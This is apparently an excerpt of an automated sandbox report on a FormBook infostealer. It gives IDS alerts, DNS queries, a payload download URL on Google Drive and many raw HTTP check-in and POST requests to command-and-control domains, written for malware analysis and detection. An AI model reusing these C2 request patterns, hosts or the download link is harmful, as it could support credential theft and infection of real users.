        Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.20:50228 -> 91.184.0.200:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:50229 -> 91.195.240.19:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:50230 -> 91.195.240.19:80
        Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.20:50233 -> 89.117.169.140:80
        Performs DNS queries to domains with low reputation
        Source: DNS query: www.echolinkevolve.xyz
        Source: Joe Sandbox ViewIP Address: 217.160.0.27 217.160.0.27
        Source: Joe Sandbox ViewIP Address: 37.97.254.27 37.97.254.27
        Source: Joe Sandbox ViewASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
        Source: Joe Sandbox ViewASN Name: ONEANDONE-ASBrauerstrasse48DE ONEANDONE-ASBrauerstrasse48DE
        Source: Joe Sandbox ViewASN Name: TRANSIP-ASAmsterdamtheNetherlandsNL TRANSIP-ASAmsterdamtheNetherlandsNL
        Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1YEiS4USubspx63PCPnPvhVVNsu4h-RY3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Host: drive.google.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/067j0cfqh00llp67j6c8t9vjf51stn5l/1701699675000/13539573903470379141/*/1YEiS4USubspx63PCPnPvhVVNsu4h-RY3?e=download&uuid=93397b9d-12f9-4f2d-8d03-b765824cb4a8 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Cache-Control: no-cacheHost: doc-0c-0k-docs.googleusercontent.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /3hr5/?TZd=5u0YN/vG2OQgb1C/S61rdtzCPX+hVrwZfQNDBdV1y3YbCYVEIx2nSMW53Cy3Ic7FhoOGTcSXNHOgJli1CYTDFI4tCK1dqGPzQQ==&1dr=yP5PQD38 HTTP/1.1Host: www.hormigonesmil.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
        Source: global trafficHTTP traffic detected: GET /3hr5/?TZd=C7q+sjkOjeHdW4KfX5XkOV+bb3qVpxl3Mz3wz487ZoyHEt9a0wBYazkTJk6RHURF+VscnNPsgG//B6D/+agfmiMJ8iKN4XKnaw==&1dr=yP5PQD38 HTTP/1.1Host: www.homesteadmath.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
        Source: global trafficHTTP traffic detected: GET /3hr5/?TZd=lEWuOoHaKeBJFGUazSVmb1afSNtW7c4aGAz9OG4Rjri38H/1L2LaU9Tlv3NTxVqSbHzxo0vPiJpjlRXDX4jfk8ag1kGN3tAtrg==&1dr=yP5PQD38 HTTP/1.1Host: www.ritualyoga.orgAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
        Source: global trafficHTTP traffic detected: GET /3hr5/?TZd=WvKXMpNdKcx12PohJdQ2Nu7zrY//6AeCNDisJJSnngoH0SI3JFeqPH7/T9Xi9rN0AVbH68W87D80yQtOqBVkzxSvcNI04lJ+LQ==&1dr=yP5PQD38 HTTP/1.1Host: www.rocsys.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
        Source: global trafficHTTP traffic detected: GET /3hr5/?TZd=JbHlBWUudHwvZJwvAXOZDEBKgaTZSnA3HzZDUQLF8+dObUm02fdCsm6RYH22N3XnV4/Dw1x9sJd7kAxoLurayq/ALLHEWghrDA==&1dr=yP5PQD38 HTTP/1.1Host: www.metodomestredojogo.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
        Source: global trafficHTTP traffic detected: GET /3hr5/?TZd=uCimyMqR3nEPval29bDaQI/GbNlN6Dg0WFpqpEFKdFHS+eYsrsaspyvmyOxFyB19ijhk+19h03NhCcIlFptZsCN8ir2ans2GUg==&1dr=yP5PQD38 HTTP/1.1Host: www.echolinkevolve.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
        Source: global trafficHTTP traffic detected: GET /3hr5/?TZd=1GBeYqUlvH78co4+g8Q+CfM+UtjAe3WyllxzQQGSa+KkDcyrOKO1xWP996LaB7yKSXvDg0vLLxD85Rjujtt4A1/HBs9QKRta2A==&1dr=yP5PQD38 HTTP/1.1Host: www.rtptornado4dnihboss.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
        Source: global trafficHTTP traffic detected: GET /3hr5/?TZd=ksyUunDrVEa0KTu9vPYxs761+eAaxKot9rPDN6rYUiwEC3plPpQTFjv1rO9K0/xZs75gUsnXDeEoWRSVvif2xqzz7ty8+MasXQ==&1dr=yP5PQD38 HTTP/1.1Host: www.slimnthinau.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
        Source: global trafficHTTP traffic detected: GET /3hr5/?TZd=SKyXXko5z7q9YQjFZFQloZKIT7V5SVEae/5q6Ytdmten2hC5b6JJ08XTyYu5k0EUJUGdyr8TcNcxF84C+h+0NQx0rsHsMlG9kw==&1dr=yP5PQD38 HTTP/1.1Host: www.080869.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
        Source: global trafficHTTP traffic detected: GET /3hr5/?TZd=mIVLDg45zmTFrESw9faeiDzJXXUQkT31xJX0RHf3EtohXuktSLitc4YcqcRWfkqc8sDZtVKgsH1VZ8DqKxZju6hVCIK2DTgKDw==&1dr=yP5PQD38 HTTP/1.1Host: www.eigenheimstattmiete.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
        Source: global trafficHTTP traffic detected: GET /3hr5/?TZd=q1X/IYN8eKewuN13aiQWFCouSmM7D+QNK5N6gfBg5YPvN3u/YjmPX9Swyhyhl1JXW1KA5roj8jCGf76SGeGao+TTCbXI7mNU4g==&1dr=yP5PQD38 HTTP/1.1Host: www.neuvillette.orgAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
        Source: global trafficHTTP traffic detected: GET /3hr5/?TZd=Ap4TCNxJOGTwjJSJsQdbrLTufwm/fHI6SBhQgXxPQrxr/rPwO1BNXP+VLlfTCp45O178MqQRyNXbll1g47V3CH2eQGoyL5qC3A==&1dr=yP5PQD38 HTTP/1.1Host: www.scoopstarz.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
        Source: global trafficHTTP traffic detected: GET /3hr5/?TZd=EijkiYqzwZN1BhBpIykWY0SibsexD2BbsSiB3fZdeNuUj8Ukz47SSRBmN8cMCE5z6SXuPEOXWwW1mi1FwYWeXvEwrZlQEKUUXQ==&1dr=yP5PQD38 HTTP/1.1Host: www.vaultedjewelry.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
        Source: global trafficHTTP traffic detected: GET /3hr5/?TZd=RBcnSiCg0exgPH7+amvyuffzGD4zp5v5QJzpEWhW15793hPIewihv82rGn5Qh8bR9T1h4/autzf2BuR5sC2Gt8s6p4k4sTzt/A==&1dr=yP5PQD38 HTTP/1.1Host: www.brls.moneyAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
        Source: global trafficHTTP traffic detected: GET /3hr5/?TZd=5u0YN/vG2OQgb1C/S61rdtzCPX+hVrwZfQNDBdV1y3YbCYVEIx2nSMW53Cy3Ic7FhoOGTcSXNHOgJli1CYTDFI4tCK1dqGPzQQ==&1dr=yP5PQD38 HTTP/1.1Host: www.hormigonesmil.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
        Source: global trafficHTTP traffic detected: GET /3hr5/?TZd=C7q+sjkOjeHdW4KfX5XkOV+bb3qVpxl3Mz3wz487ZoyHEt9a0wBYazkTJk6RHURF+VscnNPsgG//B6D/+agfmiMJ8iKN4XKnaw==&1dr=yP5PQD38 HTTP/1.1Host: www.homesteadmath.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
        Source: global trafficHTTP traffic detected: GET /3hr5/?TZd=lEWuOoHaKeBJFGUazSVmb1afSNtW7c4aGAz9OG4Rjri38H/1L2LaU9Tlv3NTxVqSbHzxo0vPiJpjlRXDX4jfk8ag1kGN3tAtrg==&1dr=yP5PQD38 HTTP/1.1Host: www.ritualyoga.orgAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
        Source: global trafficHTTP traffic detected: GET /3hr5/?TZd=WvKXMpNdKcx12PohJdQ2Nu7zrY//6AeCNDisJJSnngoH0SI3JFeqPH7/T9Xi9rN0AVbH68W87D80yQtOqBVkzxSvcNI04lJ+LQ==&1dr=yP5PQD38 HTTP/1.1Host: www.rocsys.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
        Source: global trafficHTTP traffic detected: GET /3hr5/?TZd=JbHlBWUudHwvZJwvAXOZDEBKgaTZSnA3HzZDUQLF8+dObUm02fdCsm6RYH22N3XnV4/Dw1x9sJd7kAxoLurayq/ALLHEWghrDA==&1dr=yP5PQD38 HTTP/1.1Host: www.metodomestredojogo.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
        Source: global trafficHTTP traffic detected: GET /3hr5/?TZd=uCimyMqR3nEPval29bDaQI/GbNlN6Dg0WFpqpEFKdFHS+eYsrsaspyvmyOxFyB19ijhk+19h03NhCcIlFptZsCN8ir2ans2GUg==&1dr=yP5PQD38 HTTP/1.1Host: www.echolinkevolve.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
        Source: global trafficHTTP traffic detected: GET /3hr5/?TZd=1GBeYqUlvH78co4+g8Q+CfM+UtjAe3WyllxzQQGSa+KkDcyrOKO1xWP996LaB7yKSXvDg0vLLxD85Rjujtt4A1/HBs9QKRta2A==&1dr=yP5PQD38 HTTP/1.1Host: www.rtptornado4dnihboss.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
        Source: global trafficHTTP traffic detected: GET /3hr5/?TZd=ksyUunDrVEa0KTu9vPYxs761+eAaxKot9rPDN6rYUiwEC3plPpQTFjv1rO9K0/xZs75gUsnXDeEoWRSVvif2xqzz7ty8+MasXQ==&1dr=yP5PQD38 HTTP/1.1Host: www.slimnthinau.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
        Source: global trafficHTTP traffic detected: GET /3hr5/?TZd=c86HwL6awPzuMGf5odR8ge26ZJuW2ve/yLw5siKGJriA7+WnzKeTjM+vElG16hohQNIzfICPIQpWrOzE9UWowUmJc+Cd2Q+HJw==&gpo=NNNtyBQpfR9tJN1 HTTP/1.1Host: www.austintrafficlawyer.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
        Source: global trafficHTTP traffic detected: GET /3hr5/?TZd=KIDVo8Keffnboaw8XoMrozoth4xFJ4fk1ZVbA+0ZIyIjkFdoyEHsPjmNeaT/UPsvPUpfCXSZX3H43JcvkGtZbEcm0CWLYl5Piw==&gpo=NNNtyBQpfR9tJN1 HTTP/1.1Host: www.littlehappiez.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
        Source: global trafficHTTP traffic detected: GET /3hr5/?TZd=cybVuDtLHKDYoAC8BtRtsfHHNdqM0/3VmZgYz4alBfxy2AFWbwCj5N7XVIo5x4xVvDhkEXfU/TSdDvvPnMbZ8BO8VTwNCq9LYQ==&gpo=NNNtyBQpfR9tJN1 HTTP/1.1Host: www.engindenizyurdu.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
        Source: global trafficHTTP traffic detected: GET /3hr5/?TZd=Ev/i97Tm7R4lDQvwRTbCpMnzZ5SeBkReZZSk+dIP2ayGgCnfpc6J5LuxSZ4Sg1Tim62dxJKo6oeqNUab7HWhjplzx5YkH5PNCw==&gpo=NNNtyBQpfR9tJN1 HTTP/1.1Host: www.opleverdossier.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
        Source: global trafficHTTP traffic detected: GET /3hr5/?TZd=EijkiYqzwZN1BhBpIykWY0SibsexD2BbsSiB3fZdeNuUj8Ukz47SSRBmN8cMCE5z6SXuPEOXWwW1mi1FwYWeXvEwrZlQEKUUXQ==&1dr=yP5PQD38 HTTP/1.1Host: www.vaultedjewelry.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
        Source: global trafficHTTP traffic detected: GET /3hr5/?TZd=W8hj+ZAnfVNXO/00LhML7TvkVgnbLHvZg2EZ4Jo9WuG5xJWbZ5L5hN7sKdMlw1DL3P6Y0UBuLzf410vX+kFx4V+xT/ik7P0KhQ==&gpo=NNNtyBQpfR9tJN1 HTTP/1.1Host: www.fisiocomoterapia.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
        Source: global trafficHTTP traffic detected: GET /3hr5/?TZd=5u0YN/vG2OQgb1C/S61rdtzCPX+hVrwZfQNDBdV1y3YbCYVEIx2nSMW53Cy3Ic7FhoOGTcSXNHOgJli1CYTDFI4tCK1dqGPzQQ==&1dr=yP5PQD38 HTTP/1.1Host: www.hormigonesmil.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
        Source: global trafficHTTP traffic detected: GET /3hr5/?TZd=C7q+sjkOjeHdW4KfX5XkOV+bb3qVpxl3Mz3wz487ZoyHEt9a0wBYazkTJk6RHURF+VscnNPsgG//B6D/+agfmiMJ8iKN4XKnaw==&1dr=yP5PQD38 HTTP/1.1Host: www.homesteadmath.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
        Source: global trafficHTTP traffic detected: GET /3hr5/?TZd=lEWuOoHaKeBJFGUazSVmb1afSNtW7c4aGAz9OG4Rjri38H/1L2LaU9Tlv3NTxVqSbHzxo0vPiJpjlRXDX4jfk8ag1kGN3tAtrg==&1dr=yP5PQD38 HTTP/1.1Host: www.ritualyoga.orgAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
        Source: global trafficHTTP traffic detected: GET /3hr5/?TZd=WvKXMpNdKcx12PohJdQ2Nu7zrY//6AeCNDisJJSnngoH0SI3JFeqPH7/T9Xi9rN0AVbH68W87D80yQtOqBVkzxSvcNI04lJ+LQ==&1dr=yP5PQD38 HTTP/1.1Host: www.rocsys.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
        Source: global trafficHTTP traffic detected: GET /3hr5/?TZd=JbHlBWUudHwvZJwvAXOZDEBKgaTZSnA3HzZDUQLF8+dObUm02fdCsm6RYH22N3XnV4/Dw1x9sJd7kAxoLurayq/ALLHEWghrDA==&1dr=yP5PQD38 HTTP/1.1Host: www.metodomestredojogo.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
        Source: global trafficHTTP traffic detected: GET /3hr5/?TZd=uCimyMqR3nEPval29bDaQI/GbNlN6Dg0WFpqpEFKdFHS+eYsrsaspyvmyOxFyB19ijhk+19h03NhCcIlFptZsCN8ir2ans2GUg==&1dr=yP5PQD38 HTTP/1.1Host: www.echolinkevolve.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
        Source: global trafficHTTP traffic detected: GET /3hr5/?TZd=1GBeYqUlvH78co4+g8Q+CfM+UtjAe3WyllxzQQGSa+KkDcyrOKO1xWP996LaB7yKSXvDg0vLLxD85Rjujtt4A1/HBs9QKRta2A==&1dr=yP5PQD38 HTTP/1.1Host: www.rtptornado4dnihboss.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
        Source: unknownDNS traffic detected: queries for: drive.google.com
        Source: unknownHTTP traffic detected: POST /3hr5/ HTTP/1.1Host: www.homesteadmath.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Origin: http://www.homesteadmath.comReferer: http://www.homesteadmath.com/3hr5/Connection: closeContent-Length: 184Cache-Control: no-cacheContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0Data Raw: 54 5a 64 3d 50 35 43 65 76 56 56 54 71 39 7a 6f 63 4a 43 38 54 4f 44 30 5a 53 47 57 45 48 33 78 68 43 63 30 43 53 62 58 7a 71 30 64 61 4c 36 30 54 76 35 34 39 67 51 35 48 6c 34 75 46 7a 69 2f 63 30 35 68 2b 52 77 43 73 4d 44 38 2b 6d 33 38 50 72 37 51 78 61 4d 50 71 31 78 37 2b 31 2f 33 70 42 71 69 50 77 43 46 35 4a 58 78 31 4d 43 41 54 54 53 79 44 68 71 44 57 37 5a 66 54 72 76 51 73 61 4e 6f 79 77 78 36 66 36 43 58 4b 4a 65 4b 68 35 37 44 53 51 4d 61 64 66 72 43 68 64 73 77 5a 77 66 6b 63 74 44 76 4c 6d 32 72 35 73 6c 4b 4b 42 7a 30 5a 41 3d 3d Data Ascii: TZd=P5CevVVTq9zocJC8TOD0ZSGWEH3xhCc0CSbXzq0daL60Tv549gQ5Hl4uFzi/c05h+RwCsMD8+m38Pr7QxaMPq1x7+1/3pBqiPwCF5JXx1MCATTSyDhqDW7ZfTrvQsaNoywx6f6CXKJeKh57DSQMadfrChdswZwfkctDvLm2r5slKKBz0ZA==
